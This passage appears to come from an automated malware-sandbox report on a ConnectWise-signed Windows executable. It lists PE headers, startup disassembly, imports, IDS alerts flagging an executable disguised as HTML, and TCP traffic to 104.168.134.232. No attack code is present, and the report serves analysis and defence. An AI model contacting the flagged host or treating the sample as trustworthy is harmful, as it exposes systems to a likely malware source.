                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                                                                                Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                                                Signature Valid:true
                                                                                                                                                                                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                Error Number:0
                                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                                • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                call 00007FA914CCA87Ah
                                                                                                                                                                                                                                                jmp 00007FA914CCA32Fh
                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                                                                call dword ptr [0040B048h]
                                                                                                                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                call dword ptr [0040B044h]
                                                                                                                                                                                                                                                push C0000409h
                                                                                                                                                                                                                                                call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                call dword ptr [0040B050h]
                                                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                sub esp, 00000324h
                                                                                                                                                                                                                                                push 00000017h
                                                                                                                                                                                                                                                call dword ptr [0040B054h]
                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                je 00007FA914CCA4B7h
                                                                                                                                                                                                                                                push 00000002h
                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                int 29h
                                                                                                                                                                                                                                                mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                pushfd
                                                                                                                                                                                                                                                pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2de0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .rdata0xb0000x5d580x5e00ec94ce6ebdbe57640638e0aa31d08896False0.4178025265957447Applesoft BASIC program data, first line number 14.843224204192078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                EnglishUnited States
                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                2024-12-22T12:47:14.594623+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1104.168.134.232443192.168.2.449748TCP
                                                                                                                                                                                                                                                2024-12-22T12:47:16.941092+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1104.168.134.232443192.168.2.449750TCP
                                                                                                                                                                                                                                                2024-12-22T12:47:25.014789+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1104.168.134.232443192.168.2.449756TCP
                                                                                                                                                                                                                                                2024-12-22T12:47:27.353673+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1104.168.134.232443192.168.2.449758TCP
                                                                                                                                                                                                                                                2024-12-22T12:47:30.011230+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1104.168.134.232443192.168.2.449760TCP
                                                                                                                                                                                                                                                2024-12-22T12:47:32.707382+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1104.168.134.232443192.168.2.449762TCP
                                                                                                                                                                                                                                                2024-12-22T12:47:37.091079+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1104.168.134.232443192.168.2.449763TCP
                                                                                                                                                                                                                                                2024-12-22T12:47:40.347990+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1104.168.134.232443192.168.2.449764TCP
                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Dec 22, 2024 12:46:59.531408072 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:46:59.531498909 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:46:59.531584978 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:46:59.769020081 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:46:59.769098043 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:01.816418886 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:01.816498041 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:01.843899965 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:01.844007015 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:01.844860077 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:01.889655113 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:01.911175966 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:01.951380014 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459031105 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459091902 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459112883 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459270000 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459275007 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459275961 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459372997 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459407091 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459466934 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459467888 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.459467888 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.576868057 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.576946974 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.577116013 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.577116966 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.577188015 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.577743053 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.619364023 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.619426012 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.619468927 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.619501114 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.619519949 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.619544029 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.746104956 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.746169090 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.746381998 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.746382952 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.746445894 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.746535063 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.771955013 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.772016048 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.772073030 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.772141933 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.772178888 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.772387981 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.801580906 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.801656008 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.801769018 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.801769018 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.801831961 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.801892996 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.830785990 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.830888033 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.830902100 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.830967903 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.831005096 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.831027031 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.835174084 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.835436106 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.835457087 CET44349731104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.838526011 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.857878923 CET49731443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:03.314107895 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:03.314197063 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:03.314461946 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:03.314615965 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:03.314671993 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:04.652925968 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:04.661309004 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:04.661389112 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.350920916 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.350982904 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.351027966 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.351238012 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.351238012 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.351367950 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.351429939 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.355195999 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.355278015 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.356806040 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.356929064 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.356996059 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.328684092 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.328737974 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.328792095 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.329090118 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.329103947 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.670329094 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.670416117 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.673899889 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.673912048 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.674976110 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.717669964 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.720179081 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.763329983 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358784914 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358871937 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358892918 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358944893 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358969927 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358982086 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359018087 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359021902 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359035015 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359065056 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359086990 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413402081 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413495064 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413507938 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413541079 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413552999 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413583040 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557511091 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557601929 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557602882 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557661057 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557670116 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557749987 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594614029 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594697952 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594749928 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594750881 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594760895 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594819069 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.625859976 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.625946045 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.625972986 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.625982046 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.626054049 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.654911995 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.654988050 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655039072 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655039072 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655046940 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655081034 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655108929 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655222893 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655853033 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.657349110 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.686233044 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.686275959 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.686363935 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.688702106 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.688718081 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.027808905 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.029460907 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.029484034 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718158007 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718221903 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718266010 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718276978 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718296051 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718308926 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718331099 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.772886992 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.772949934 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.772985935 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.773003101 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.773034096 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.773087978 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.915966034 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916018963 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916084051 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916095972 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916122913 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916147947 CET49750443192.168.2.4104.168.134.232
